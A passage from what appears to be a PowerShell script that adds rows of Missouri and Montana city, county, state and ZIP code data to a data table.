$Cities.Rows.Add("Syracuse","Morgan","Missouri","MO","29","65354") + $null = $Cities.Rows.Add("Warsaw","Benton","Missouri","MO","29","65355") + $null = $Cities.Rows.Add("Windsor","Henry","Missouri","MO","29","65360") + $null = $Cities.Rows.Add("Zcta 653hh","Benton","Missouri","MO","29","653HH") + $null = $Cities.Rows.Add("Rolla","Phelps","Missouri","MO","29","65401") + $null = $Cities.Rows.Add("Beulah","Phelps","Missouri","MO","29","65436") + $null = $Cities.Rows.Add("Birch tree","Shannon","Missouri","MO","29","65438") + $null = $Cities.Rows.Add("Bixby","Iron","Missouri","MO","29","65439") + $null = $Cities.Rows.Add("Boss","Dent","Missouri","MO","29","65440") + $null = $Cities.Rows.Add("Bourbon","Crawford","Missouri","MO","29","65441") + $null = $Cities.Rows.Add("Brinktown","Maries","Missouri","MO","29","65443") + $null = $Cities.Rows.Add("Bucyrus","Texas","Missouri","MO","29","65444") + $null = $Cities.Rows.Add("Cherryville","Crawford","Missouri","MO","29","65446") + $null = $Cities.Rows.Add("Cook station","Crawford","Missouri","MO","29","65449") + $null = $Cities.Rows.Add("Crocker","Pulaski","Missouri","MO","29","65452") + $null = $Cities.Rows.Add("Cuba","Crawford","Missouri","MO","29","65453") + $null = $Cities.Rows.Add("Davisville","Crawford","Missouri","MO","29","65456") + $null = $Cities.Rows.Add("Devils elbow","Pulaski","Missouri","MO","29","65457") + $null = $Cities.Rows.Add("Dixon","Pulaski","Missouri","MO","29","65459") + $null = $Cities.Rows.Add("Duke","Pulaski","Missouri","MO","29","65461") + $null = $Cities.Rows.Add("Edgar springs","Phelps","Missouri","MO","29","65462") + $null = $Cities.Rows.Add("Eldridge","Laclede","Missouri","MO","29","65463") + $null = $Cities.Rows.Add("Elk creek","Texas","Missouri","MO","29","65464") + $null = $Cities.Rows.Add("Eminence","Shannon","Missouri","MO","29","65466") + $null = $Cities.Rows.Add("Eunice","Texas","Missouri","MO","29","65468") + $null = $Cities.Rows.Add("Falcon","Laclede","Missouri","MO","29","65470") + $null = $Cities.Rows.Add("Fort leonard woo","Pulaski","Missouri","MO","29","65473") + $null = $Cities.Rows.Add("Hartshorn","Texas","Missouri","MO","29","65479") + $null = $Cities.Rows.Add("Houston","Texas","Missouri","MO","29","65483") + $null = $Cities.Rows.Add("Huggins","Texas","Missouri","MO","29","65484") + $null = $Cities.Rows.Add("Iberia","Miller","Missouri","MO","29","65486") + $null = $Cities.Rows.Add("Zcta 654hh","Maries","Missouri","MO","29","654HH") + $null = $Cities.Rows.Add("Jadwin","Dent","Missouri","MO","29","65501") + $null = $Cities.Rows.Add("Jerome","Phelps","Missouri","MO","29","65529") + $null = $Cities.Rows.Add("Lake spring","Dent","Missouri","MO","29","65532") + $null = $Cities.Rows.Add("Laquey","Pulaski","Missouri","MO","29","65534") + $null = $Cities.Rows.Add("Leasburg","Crawford","Missouri","MO","29","65535") + $null = $Cities.Rows.Add("Lebanon","Laclede","Missouri","MO","29","65536") + $null = $Cities.Rows.Add("Anutt","Dent","Missouri","MO","29","65540") + $null = $Cities.Rows.Add("Lenox","Dent","Missouri","MO","29","65541") + $null = $Cities.Rows.Add("Licking","Texas","Missouri","MO","29","65542") + $null = $Cities.Rows.Add("Lynchburg","Laclede","Missouri","MO","29","65543") + $null = $Cities.Rows.Add("Mountain view","Howell","Missouri","MO","29","65548") + $null = $Cities.Rows.Add("Newburg","Phelps","Missouri","MO","29","65550") + $null = $Cities.Rows.Add("Plato","Texas","Missouri","MO","29","65552") + $null = $Cities.Rows.Add("Raymondville","Texas","Missouri","MO","29","65555") + $null = $Cities.Rows.Add("Richland","Pulaski","Missouri","MO","29","65556") + $null = $Cities.Rows.Add("Roby","Texas","Missouri","MO","29","65557") + $null = $Cities.Rows.Add("Saint james","Phelps","Missouri","MO","29","65559") + $null = $Cities.Rows.Add("Salem","Dent","Missouri","MO","29","65560") + $null = $Cities.Rows.Add("Solo","Texas","Missouri","MO","29","65564") + $null = $Cities.Rows.Add("Berryman","Crawford","Missouri","MO","29","65565") + $null = $Cities.Rows.Add("Viburnum","Iron","Missouri","MO","29","65566") + $null = $Cities.Rows.Add("Stoutland","Camden","Missouri","MO","29","65567") + $null = $Cities.Rows.Add("Success","Texas","Missouri","MO","29","65570") + $null = $Cities.Rows.Add("Summersville","Texas","Missouri","MO","29","65571") + $null = $Cities.Rows.Add("Vichy","Maries","Missouri","MO","29","65580") + $null = $Cities.Rows.Add("Vienna","Maries","Missouri","MO","29","65582") + $null = $Cities.Rows.Add("Saint robert","Pulaski","Missouri","MO","29","65583") + $null = $Cities.Rows.Add("Winona","Shannon","Missouri","MO","29","65588") + $null = $Cities.Rows.Add("Yukon","Texas","Missouri","MO","29","65589") + $null = $Cities.Rows.Add("Long lane","Dallas","Missouri","MO","29","65590") + $null = $Cities.Rows.Add("Montreal","Camden","Missouri","MO","29","65591") + $null = $Cities.Rows.Add("Zcta 655hh","Maries","Missouri","MO","29","655HH") + $null = $Cities.Rows.Add("Aldrich","Polk","Missouri","MO","29","65601") + $null = $Cities.Rows.Add("Arcola","Dade","Missouri","MO","29","65603") + $null = $Cities.Rows.Add("Ash grove","Greene","Missouri","MO","29","65604") + $null = $Cities.Rows.Add("Jenkins","Lawrence","Missouri","MO","29","65605") + $null = $Cities.Rows.Add("Riverton","Oregon","Missouri","MO","29","65606") + $null = $Cities.Rows.Add("Ava","Douglas","Missouri","MO","29","65608") + $null = $Cities.Rows.Add("Bakersfield","Ozark","Missouri","MO","29","65609") + $null = $Cities.Rows.Add("Billings","Christian","Missouri","MO","29","65610") + $null = $Cities.Rows.Add("Blue eye","Stone","Missouri","MO","29","65611") + $null = $Cities.Rows.Add("Bois d arc","Greene","Missouri","MO","29","65612") + $null = $Cities.Rows.Add("Bolivar","Polk","Missouri","MO","29","65613") + $null = $Cities.Rows.Add("Bradleyville","Taney","Missouri","MO","29","65614") + $null = $Cities.Rows.Add("Marvel cave park","Taney","Missouri","MO","29","65616") + $null = $Cities.Rows.Add("Brighton","Polk","Missouri","MO","29","65617") + $null = $Cities.Rows.Add("Brixey","Ozark","Missouri","MO","29","65618") + $null = $Cities.Rows.Add("Brookline statio","Greene","Missouri","MO","29","65619") + $null = $Cities.Rows.Add("Bruner","Christian","Missouri","MO","29","65620") + $null = $Cities.Rows.Add("Buffalo","Dallas","Missouri","MO","29","65622") + $null = $Cities.Rows.Add("Butterfield","Barry","Missouri","MO","29","65623") + $null = $Cities.Rows.Add("Cape fair","Stone","Missouri","MO","29","65624") + $null = $Cities.Rows.Add("Cassville","Barry","Missouri","MO","29","65625") + $null = $Cities.Rows.Add("Caulfield","Howell","Missouri","MO","29","65626") + $null = $Cities.Rows.Add("Cedarcreek","Taney","Missouri","MO","29","65627") + $null = $Cities.Rows.Add("Chadwick","Christian","Missouri","MO","29","65629") + $null = $Cities.Rows.Add("Chestnutridge","Christian","Missouri","MO","29","65630") + $null = $Cities.Rows.Add("Clever","Christian","Missouri","MO","29","65631") + $null = $Cities.Rows.Add("Conway","Laclede","Missouri","MO","29","65632") + $null = $Cities.Rows.Add("Crane","Stone","Missouri","MO","29","65633") + $null = $Cities.Rows.Add("Cross timbers","Hickory","Missouri","MO","29","65634") + $null = $Cities.Rows.Add("Dadeville","Dade","Missouri","MO","29","65635") + $null = $Cities.Rows.Add("Dora","Ozark","Missouri","MO","29","65637") + $null = $Cities.Rows.Add("Drury","Douglas","Missouri","MO","29","65638") + $null = $Cities.Rows.Add("Dunnegan","Polk","Missouri","MO","29","65640") + $null = $Cities.Rows.Add("Eagle rock","Barry","Missouri","MO","29","65641") + $null = $Cities.Rows.Add("Elkland","Dallas","Missouri","MO","29","65644") + $null = $Cities.Rows.Add("Everton","Dade","Missouri","MO","29","65646") + $null = $Cities.Rows.Add("Exeter","Barry","Missouri","MO","29","65647") + $null = $Cities.Rows.Add("Fair grove","Greene","Missouri","MO","29","65648") + $null = $Cities.Rows.Add("Fair play","Polk","Missouri","MO","29","65649") + $null = $Cities.Rows.Add("Flemington","Hickory","Missouri","MO","29","65650") + $null = $Cities.Rows.Add("Fordland","Webster","Missouri","MO","29","65652") + $null = $Cities.Rows.Add("Forsyth","Taney","Missouri","MO","29","65653") + $null = $Cities.Rows.Add("Gainesville","Ozark","Missouri","MO","29","65655") + $null = $Cities.Rows.Add("Galena","Stone","Missouri","MO","29","65656") + $null = $Cities.Rows.Add("Garrison","Christian","Missouri","MO","29","65657") + $null = $Cities.Rows.Add("Golden","Barry","Missouri","MO","29","65658") + $null = $Cities.Rows.Add("Goodson","Polk","Missouri","MO","29","65659") + $null = $Cities.Rows.Add("Graff","Wright","Missouri","MO","29","65660") + $null = $Cities.Rows.Add("Greenfield","Dade","Missouri","MO","29","65661") + $null = $Cities.Rows.Add("Grovespring","Wright","Missouri","MO","29","65662") + $null = $Cities.Rows.Add("Half way","Polk","Missouri","MO","29","65663") + $null = $Cities.Rows.Add("Halltown","Lawrence","Missouri","MO","29","65664") + $null = $Cities.Rows.Add("Hartville","Wright","Missouri","MO","29","65667") + $null = $Cities.Rows.Add("Hermitage","Hickory","Missouri","MO","29","65668") + $null = $Cities.Rows.Add("Highlandville","Christian","Missouri","MO","29","65669") + $null = $Cities.Rows.Add("Hollister","Taney","Missouri","MO","29","65672") + $null = $Cities.Rows.Add("Humansville","Polk","Missouri","MO","29","65674") + $null = $Cities.Rows.Add("Hurley","Stone","Missouri","MO","29","65675") + $null = $Cities.Rows.Add("Isabella","Ozark","Missouri","MO","29","65676") + $null = $Cities.Rows.Add("Kirbyville","Taney","Missouri","MO","29","65679") + $null = $Cities.Rows.Add("Kissee mills","Taney","Missouri","MO","29","65680") + $null = $Cities.Rows.Add("Lampe","Stone","Missouri","MO","29","65681") + $null = $Cities.Rows.Add("Lockwood","Dade","Missouri","MO","29","65682") + $null = $Cities.Rows.Add("Louisburg","Dallas","Missouri","MO","29","65685") + $null = $Cities.Rows.Add("Kimberling city","Stone","Missouri","MO","29","65686") + $null = $Cities.Rows.Add("Cabool","Texas","Missouri","MO","29","65689") + $null = $Cities.Rows.Add("Couch","Oregon","Missouri","MO","29","65690") + $null = $Cities.Rows.Add("Koshkonong","Oregon","Missouri","MO","29","65692") + $null = $Cities.Rows.Add("Zcta 656hh","Barry","Missouri","MO","29","656HH") + $null = $Cities.Rows.Add("Mc clurg","Taney","Missouri","MO","29","65701") + $null = $Cities.Rows.Add("Macomb","Wright","Missouri","MO","29","65702") + $null = $Cities.Rows.Add("Mansfield","Wright","Missouri","MO","29","65704") + $null = $Cities.Rows.Add("Marionville","Lawrence","Missouri","MO","29","65705") + $null = $Cities.Rows.Add("Marshfield","Webster","Missouri","MO","29","65706") + $null = $Cities.Rows.Add("Miller","Lawrence","Missouri","MO","29","65707") + $null = $Cities.Rows.Add("Monett","Barry","Missouri","MO","29","65708") + $null = $Cities.Rows.Add("Morrisville","Polk","Missouri","MO","29","65710") + $null = $Cities.Rows.Add("Mountain grove","Wright","Missouri","MO","29","65711") + $null = $Cities.Rows.Add("Mount vernon","Lawrence","Missouri","MO","29","65712") + $null = $Cities.Rows.Add("Niangua","Webster","Missouri","MO","29","65713") + $null = $Cities.Rows.Add("Nixa","Christian","Missouri","MO","29","65714") + $null = $Cities.Rows.Add("Noble","Ozark","Missouri","MO","29","65715") + $null = $Cities.Rows.Add("Norwood","Wright","Missouri","MO","29","65717") + $null = $Cities.Rows.Add("Oldfield","Christian","Missouri","MO","29","65720") + $null = $Cities.Rows.Add("Ozark","Christian","Missouri","MO","29","65721") + $null = $Cities.Rows.Add("Phillipsburg","Laclede","Missouri","MO","29","65722") + $null = $Cities.Rows.Add("Pierce city","Lawrence","Missouri","MO","29","65723") + $null = $Cities.Rows.Add("Pittsburg","Hickory","Missouri","MO","29","65724") + $null = $Cities.Rows.Add("Pleasant hope","Polk","Missouri","MO","29","65725") + $null = $Cities.Rows.Add("Polk","Polk","Missouri","MO","29","65727") + $null = $Cities.Rows.Add("Ponce de leon","Stone","Missouri","MO","29","65728") + $null = $Cities.Rows.Add("Pontiac","Ozark","Missouri","MO","29","65729") + $null = $Cities.Rows.Add("Powell","McDonald","Missouri","MO","29","65730") + $null = $Cities.Rows.Add("Powersite","Taney","Missouri","MO","29","65731") + $null = $Cities.Rows.Add("Preston","Hickory","Missouri","MO","29","65732") + $null = $Cities.Rows.Add("Protem","Taney","Missouri","MO","29","65733") + $null = $Cities.Rows.Add("Purdy","Barry","Missouri","MO","29","65734") + $null = $Cities.Rows.Add("Quincy","Hickory","Missouri","MO","29","65735") + $null = $Cities.Rows.Add("Branson west","Stone","Missouri","MO","29","65737") + $null = $Cities.Rows.Add("Republic","Greene","Missouri","MO","29","65738") + $null = $Cities.Rows.Add("Ridgedale","Taney","Missouri","MO","29","65739") + $null = $Cities.Rows.Add("Rockaway beach","Taney","Missouri","MO","29","65740") + $null = $Cities.Rows.Add("Rogersville","Greene","Missouri","MO","29","65742") + $null = $Cities.Rows.Add("Rueter","Taney","Missouri","MO","29","65744") + $null = $Cities.Rows.Add("Seligman","Barry","Missouri","MO","29","65745") + $null = $Cities.Rows.Add("Seymour","Webster","Missouri","MO","29","65746") + $null = $Cities.Rows.Add("Shell knob","Barry","Missouri","MO","29","65747") + $null = $Cities.Rows.Add("South greenfield","Dade","Missouri","MO","29","65752") + $null = $Cities.Rows.Add("Sparta","Christian","Missouri","MO","29","65753") + $null = $Cities.Rows.Add("Spokane","Christian","Missouri","MO","29","65754") + $null = $Cities.Rows.Add("Squires","Douglas","Missouri","MO","29","65755") + $null = $Cities.Rows.Add("Stotts city","Lawrence","Missouri","MO","29","65756") + $null = $Cities.Rows.Add("Strafford","Greene","Missouri","MO","29","65757") + $null = $Cities.Rows.Add("Taneyville","Taney","Missouri","MO","29","65759") + $null = $Cities.Rows.Add("Tecumseh","Ozark","Missouri","MO","29","65760") + $null = $Cities.Rows.Add("Dugginsville","Ozark","Missouri","MO","29","65761") + $null = $Cities.Rows.Add("Nottinghill","Ozark","Missouri","MO","29","65762") + $null = $Cities.Rows.Add("Tunas","Dallas","Missouri","MO","29","65764") + $null = $Cities.Rows.Add("Udall","Ozark","Missouri","MO","29","65766") + $null = $Cities.Rows.Add("Urbana","Dallas","Missouri","MO","29","65767") + $null = $Cities.Rows.Add("Vanzant","Douglas","Missouri","MO","29","65768") + $null = $Cities.Rows.Add("Verona","Lawrence","Missouri","MO","29","65769") + $null = $Cities.Rows.Add("Walnut grove","Greene","Missouri","MO","29","65770") + $null = $Cities.Rows.Add("Walnut shade","Taney","Missouri","MO","29","65771") + $null = $Cities.Rows.Add("Washburn","Barry","Missouri","MO","29","65772") + $null = $Cities.Rows.Add("Souder","Ozark","Missouri","MO","29","65773") + $null = $Cities.Rows.Add("Weaubleau","Hickory","Missouri","MO","29","65774") + $null = $Cities.Rows.Add("West plains","Howell","Missouri","MO","29","65775") + $null = $Cities.Rows.Add("Moody","Howell","Missouri","MO","29","65777") + $null = $Cities.Rows.Add("Myrtle","Oregon","Missouri","MO","29","65778") + $null = $Cities.Rows.Add("Wheatland","Hickory","Missouri","MO","29","65779") + $null = $Cities.Rows.Add("Willard","Greene","Missouri","MO","29","65781") + $null = $Cities.Rows.Add("Windyville","Dallas","Missouri","MO","29","65783") + $null = $Cities.Rows.Add("Zanoni","Ozark","Missouri","MO","29","65784") + $null = $Cities.Rows.Add("Stockton","Cedar","Missouri","MO","29","65785") + $null = $Cities.Rows.Add("Macks creek","Camden","Missouri","MO","29","65786") + $null = $Cities.Rows.Add("Roach","Camden","Missouri","MO","29","65787") + $null = $Cities.Rows.Add("Peace valley","Howell","Missouri","MO","29","65788") + $null = $Cities.Rows.Add("Pomona","Howell","Missouri","MO","29","65789") + $null = $Cities.Rows.Add("Pottersville","Howell","Missouri","MO","29","65790") + $null = $Cities.Rows.Add("Thayer","Oregon","Missouri","MO","29","65791") + $null = $Cities.Rows.Add("Willow springs","Howell","Missouri","MO","29","65793") + $null = $Cities.Rows.Add("Zcta 657hh","Barry","Missouri","MO","29","657HH") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65802") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65803") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65804") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65806") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65807") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65809") + $null = $Cities.Rows.Add("Springfield","Greene","Missouri","MO","29","65810") + $null = $Cities.Rows.Add("Zcta 658hh","Greene","Missouri","MO","29","658HH") + $null = $Cities.Rows.Add("","Taney","Missouri","MO","29","72644") + $null = $Cities.Rows.Add("Absarokee","Stillwater","Montana","MT","30","59001") + $null = $Cities.Rows.Add("Acton","Yellowstone","Montana","MT","30","59002") + $null = $Cities.Rows.Add("Ashland","Rosebud","Montana","MT","30","59003") + $null = $Cities.Rows.Add("Ballantine","Yellowstone","Montana","MT","30","59006") + $null = $Cities.Rows.Add("Bearcreek","Carbon","Montana","MT","30","59007") + $null = $Cities.Rows.Add("Belfry","Carbon","Montana","MT","30","59008") + $null = $Cities.Rows.Add("Bighorn","Treasure","Montana","MT","30","59010") + $null = $Cities.Rows.Add("Big timber","Sweet Grass","Montana","MT","30","59011") + $null = $Cities.Rows.Add("Birney","Rosebud","Montana","MT","30","59012") + $null = $Cities.Rows.Add("Boyd","Carbon","Montana","MT","30","59013") + $null = $Cities.Rows.Add("Bridger","Carbon","Montana","MT","30","59014") + $null = $Cities.Rows.Add("Broadview","Yellowstone","Montana","MT","30","59015") + $null = $Cities.Rows.Add("Busby","Big Horn","Montana","MT","30","59016") + $null = $Cities.Rows.Add("Clyde park","Park","Montana","MT","30","59018") + $null = $Cities.Rows.Add("Columbus","Stillwater","Montana","MT","30","59019") + $null = $Cities.Rows.Add("Cooke city","Park","Montana","MT","30","59020") + $null = $Cities.Rows.Add("Crow agency","Big Horn","Montana","MT","30","59022") + $null = $Cities.Rows.Add("Custer","Yellowstone","Montana","MT","30","59024") + $null = $Cities.Rows.Add("Decker","Big Horn","Montana","MT","30","59025") + $null = $Cities.Rows.Add("Edgar","Carbon","Montana","MT","30","59026") + $null = $Cities.Rows.Add("Emigrant","Park","Montana","MT","30","59027") + $null = $Cities.Rows.Add("Fishtail","Stillwater","Montana","MT","30","59028") + $null = $Cities.Rows.Add("Fromberg","Carbon","Montana","MT","30","59029") + $null = $Cities.Rows.Add("Gardiner","Park","Montana","MT","30","59030") + $null = $Cities.Rows.Add("Garryowen","Big Horn","Montana","MT","30","59031") + $null = $Cities.Rows.Add("Grass range","Fergus","Montana","MT","30","59032") + $null = $Cities.Rows.Add("Greycliff","Sweet Grass","Montana","MT","30","59033") + $null = $Cities.Rows.Add("Hardin","Big Horn","Montana","MT","30","59034") + $null = $Cities.Rows.Add("Yellowtail","Big Horn","Montana","MT","30","59035") + $null = $Cities.Rows.Add("Harlowton","Wheatland","Montana","MT","30","59036") + $null = $Cities.Rows.Add("Huntley","Yellowstone","Montana","MT","30","59037") + $null = $Cities.Rows.Add("Hysham","Treasure","Montana","MT","30","59038") + $null = $Cities.Rows.Add("Ingomar","Rosebud","Montana","MT","30","59039") + $null = $Cities.Rows.Add("Silesia","Carbon","Montana","MT","30","59041") + $null = $Cities.Rows.Add("Lame deer","Rosebud","Montana","MT","30","59043") + $null = $Cities.Rows.Add("Laurel","Yellowstone","Montana","MT","30","59044") + $null = $Cities.Rows.Add("Lavina","Golden Valley","Montana","MT","30","59046") + $null = $Cities.Rows.Add("Livingston","Park","Montana","MT","30","59047") + $null = $Cities.Rows.Add("Lodge grass","Big Horn","Montana","MT","30","59050") + $null = $Cities.Rows.Add("Mc leod","Sweet Grass","Montana","MT","30","59052") + $null = $Cities.Rows.Add("Martinsdale","Meagher","Montana","MT","30","59053") + $null = $Cities.Rows.Add("Melstone","Musselshell","Montana","MT","30","59054") + $null = $Cities.Rows.Add("Melville","Sweet Grass","Montana","MT","30","59055") + $null = $Cities.Rows.Add("Molt","Yellowstone","Montana","MT","30","59057") + $null = $Cities.Rows.Add("Mosby","Garfield","Montana","MT","30","59058") + $null = $Cities.Rows.Add("Musselshell","Musselshell","Montana","MT","30","59059") + $null = $Cities.Rows.Add("Nye","Stillwater","Montana","MT","30","59061") + $null = $Cities.Rows.Add("Otter","Powder River","Montana","MT","30","59062") + $null = $Cities.Rows.Add("Park city","Stillwater","Montana","MT","30","59063") + $null = $Cities.Rows.Add("Pompeys pillar","Yellowstone","Montana","MT","30","59064") + $null = $Cities.Rows.Add("Pray","Park","Montana","MT","30","59065") + $null = $Cities.Rows.Add("Pryor","Big Horn","Montana","MT","30","59066") + $null = $Cities.Rows.Add("Rapelje","Stillwater","Montana","MT","30","59067") + $null = $Cities.Rows.Add("Red lodge","Carbon","Montana","MT","30","59068") + $null = $Cities.Rows.Add("Reedpoint","Stillwater","Montana","MT","30","59069") + $null = $Cities.Rows.Add("Roberts","Carbon","Montana","MT","30","59070") + $null = $Cities.Rows.Add("Roscoe","Carbon","Montana","MT","30","59071") + $null = $Cities.Rows.Add("Roundup","Musselshell","Montana","MT","30","59072") + $null = $Cities.Rows.Add("Ryegate","Golden Valley","Montana","MT","30","59074") + $null = $Cities.Rows.Add("Saint xavier","Big Horn","Montana","MT","30","59075") + $null = $Cities.Rows.Add("Sanders","Treasure","Montana","MT","30","59076") + $null = $Cities.Rows.Add("Sand springs","Garfield","Montana","MT","30","59077") + $null = $Cities.Rows.Add("Shawmut","Wheatland","Montana","MT","30","59078") + $null = $Cities.Rows.Add("Shepherd","Yellowstone","Montana","MT","30","59079") + $null = $Cities.Rows.Add("Silver gate","Park","Montana","MT","30","59081") + $null = $Cities.Rows.Add("Twodot","Wheatland","Montana","MT","30","59085") + $null = $Cities.Rows.Add("Wilsall","Park","Montana","MT","30","59086") + $null = $Cities.Rows.Add("Winnett","Petroleum","Montana","MT","30","59087") + $null = $Cities.Rows.Add("Worden","Yellowstone","Montana","MT","30","59088") + $null = $Cities.Rows.Add("Wyola","Big Horn","Montana","MT","30","59089") + $null = $Cities.Rows.Add("Zcta 590hh","Carbon","Montana","MT","30","590HH") + $null = $Cities.Rows.Add("Zcta 590xx","Park","Montana","MT","30","590XX") + $null = $Cities.Rows.Add("Billings","Yellowstone","Montana","MT","30","59101") + $null = $Cities.Rows.Add("Billings","Yellowstone","Montana","MT","30","59102") + $null = $Cities.Rows.Add("Billings heights","Yellowstone","Montana","MT","30","59105") + $null = $Cities.Rows.Add("Billings","Yellowstone","Montana","MT","30","59106") + $null = $Cities.Rows.Add("Wolf point","Roosevelt","Montana","MT","30","59201") + $null = $Cities.Rows.Add("Antelope","Sheridan","Montana","MT","30","59211") + $null = $Cities.Rows.Add("Bainville","Roosevelt","Montana","MT","30","59212") + $null = $Cities.Rows.Add("Brockton","Roosevelt","Montana","MT","30","59213") + $null = $Cities.Rows.Add("Brockway","McCone","Montana","MT","30","59214") + $null = $Cities.Rows.Add("Circle","McCone","Montana","MT","30","59215") + $null = $Cities.Rows.Add("Crane","Richland","Montana","MT","30","59217") + $null = $Cities.Rows.Add("Culbertson","Roosevelt","Montana","MT","30","59218") + $null = $Cities.Rows.Add("Dagmar","Sheridan","Montana","MT","30","59219") + $null = $Cities.Rows.Add("Fairview","Richland","Montana","MT","30","59221") + $null = $Cities.Rows.Add("Flaxville","Daniels","Montana","MT","30","59222") + $null = $Cities.Rows.Add("Fort peck","Valley","Montana","MT","30","59223") + $null = $Cities.Rows.Add("Lustre","Valley","Montana","MT","30","59225") + $null = $Cities.Rows.Add("Froid","Roosevelt","Montana","MT","30","59226") + $null = $Cities.Rows.Add("Glasgow","Valley","Montana","MT","30","59230") + $null = $Cities.Rows.Add("Saint marie","Valley","Montana","MT","30","59231") + $null = $Cities.Rows.Add("Hinsdale","Valley","Montana","MT","30","59241") + $null = $Cities.Rows.Add("Homestead","Roosevelt","Montana","MT","30","59242") + $null = $Cities.Rows.Add("Lambert","Richland","Montana","MT","30","59243") + $null = $Cities.Rows.Add("Larslan","Valley","Montana","MT","30","59244") + $null = $Cities.Rows.Add("Medicine lake","Sheridan","Montana","MT","30","59247") + $null = $Cities.Rows.Add("Nashua","Valley","Montana","MT","30","59248") + $null = $Cities.Rows.Add("Opheim","Valley","Montana","MT","30","59250") + $null = $Cities.Rows.Add("Outlook","Sheridan","Montana","MT","30","59252") + $null = $Cities.Rows.Add("Peerless","Daniels","Montana","MT","30","59253") + $null = $Cities.Rows.Add("Plentywood","Sheridan","Montana","MT","30","59254") + $null = $Cities.Rows.Add("Poplar","Roosevelt","Montana","MT","30","59255") + $null = $Cities.Rows.Add("Redstone","Sheridan","Montana","MT","30","59257") + $null = $Cities.Rows.Add("Reserve","Sheridan","Montana","MT","30","59258") + $null = $Cities.Rows.Add("Richey","Dawson","Montana","MT","30","59259") + $null = $Cities.Rows.Add("Richland","Valley","Montana","MT","30","59260") + $null = $Cities.Rows.Add("Saco","Phillips","Montana","MT","30","59261") + $null = $Cities.Rows.Add("Savage","Richland","Montana","MT","30","59262") + $null = $Cities.Rows.Add("Scobey","Daniels","Montana","MT","30","59263") + $null = $Cities.Rows.Add("Sidney","Richland","Montana","MT","30","59270") + $null = $Cities.Rows.Add("Vida","McCone","Montana","MT","30","59274") + $null = $Cities.Rows.Add("Westby","Sheridan","Montana","MT","30","59275") + $null = $Cities.Rows.Add("Whitetail","Daniels","Montana","MT","30","59276") + $null = $Cities.Rows.Add("Zcta 592hh","Richland","Montana","MT","30","592HH") + $null = $Cities.Rows.Add("Miles city","Custer","Montana","MT","30","59301") + $null = $Cities.Rows.Add("Alzada","Carter","Montana","MT","30","59311") + $null = $Cities.Rows.Add("Baker","Fallon","Montana","MT","30","59313") + $null = $Cities.Rows.Add("Biddle","Powder River","Montana","MT","30","59314") + $null = $Cities.Rows.Add("Bloomfield","Dawson","Montana","MT","30","59315") + $null = $Cities.Rows.Add("Belle creek","Powder River","Montana","MT","30","59317") + $null = $Cities.Rows.Add("Brusett","Garfield","Montana","MT","30","59318") + $null = $Cities.Rows.Add("Cohagen","Garfield","Montana","MT","30","59322") + $null = $Cities.Rows.Add("Colstrip","Rosebud","Montana","MT","30","59323") + $null = $Cities.Rows.Add("Ekalaka","Carter","Montana","MT","30","59324") + $null = $Cities.Rows.Add("Fallon","Prairie","Montana","MT","30","59326") + $null = $Cities.Rows.Add("Forsyth","Rosebud","Montana","MT","30","59327") + $null = $Cities.Rows.Add("Glendive","Dawson","Montana","MT","30","59330") + $null = $Cities.Rows.Add("Hammond","Carter","Montana","MT","30","59332") + $null = $Cities.Rows.Add("Hathaway","Rosebud","Montana","MT","30","59333") + $null = $Cities.Rows.Add("Ismay","Custer","Montana","MT","30","59336") + $null = $Cities.Rows.Add("Jordan","Garfield","Montana","MT","30","59337") + $null = $Cities.Rows.Add("Kinsey","Custer","Montana","MT","30","59338") + $null = $Cities.Rows.Add("Lindsay","Dawson","Montana","MT","30","59339") + $null = $Cities.Rows.Add("Olive","Powder River","Montana","MT","30","59343") + $null = $Cities.Rows.Add("Plevna","Fallon","Montana","MT","30","59344") + $null = $Cities.Rows.Add("Rosebud","Rosebud","Montana","MT","30","59347") + $null = $Cities.Rows.Add("Sonnette","Powder River","Montana","MT","30","59348") + $null = $Cities.Rows.Add("Terry","Prairie","Montana","MT","30","59349") + $null = $Cities.Rows.Add("Volborg","Custer","Montana","MT","30","59351") + $null = $Cities.Rows.Add("Wibaux","Wibaux","Montana","MT","30","59353") + $null = $Cities.Rows.Add("Willard","Fallon","Montana","MT","30","59354") + $null = $Cities.Rows.Add("Zcta 593hh","Garfield","Montana","MT","30","593HH") + $null = $Cities.Rows.Add("Zcta 593xx","Powder River","Montana","MT","30","593XX") + $null = $Cities.Rows.Add("Great falls","Cascade","Montana","MT","30","59401") + $null = $Cities.Rows.Add("Great falls","Cascade","Montana","MT","30","59404") + $null = $Cities.Rows.Add("Great falls","Cascade","Montana","MT","30","59405") + $null = $Cities.Rows.Add("Augusta","Lewis and Clark","Montana","MT","30","59410") + $null = $Cities.Rows.Add("Babb","Glacier","Montana","MT","30","59411") + $null = $Cities.Rows.Add("Belt","Cascade","Montana","MT","30","59412") + $null = $Cities.Rows.Add("Black eagle","Cascade","Montana","MT","30","59414") + $null = $Cities.Rows.Add("Brady","Pondera","Montana","MT","30","59416") + $null = $Cities.Rows.Add("Saint mary","Glacier","Montana","MT","30","59417") + $null = $Cities.Rows.Add("Bynum","Teton","Montana","MT","30","59419") + $null = $Cities.Rows.Add("Carter","Chouteau","Montana","MT","30","59420") + $null = $Cities.Rows.Add("Cascade","Cascade","Montana","MT","30","59421") + $null = $Cities.Rows.Add("Choteau","Teton","Montana","MT","30","59422") + $null = $Cities.Rows.Add("Coffee creek","Fergus","Montana","MT","30","59424") + $null = $Cities.Rows.Add("Conrad","Pondera","Montana","MT","30","59425") + $null = $Cities.Rows.Add("Cut bank","Glacier","Montana","MT","30","59427") + $null = $Cities.Rows.Add("Denton","Fergus","Montana","MT","30","59430") + $null = $Cities.Rows.Add("Dupuyer","Pondera","Montana","MT","30","59432") + $null = $Cities.Rows.Add("Dutton","Teton","Montana","MT","30","59433") + $null = $Cities.Rows.Add("East glacier par","Glacier","Montana","MT","30","59434") + $null = $Cities.Rows.Add("Fairfield","Teton","Montana","MT","30","59436") + $null = $Cities.Rows.Add("Floweree","Chouteau","Montana","MT","30","59440") + $null = $Cities.Rows.Add("Forestgrove","Fergus","Montana","MT","30","59441") + $null = $Cities.Rows.Add("Fort benton","Chouteau","Montana","MT","30","59442") + $null = $Cities.Rows.Add("Fort shaw","Cascade","Montana","MT","30","59443") + $null = 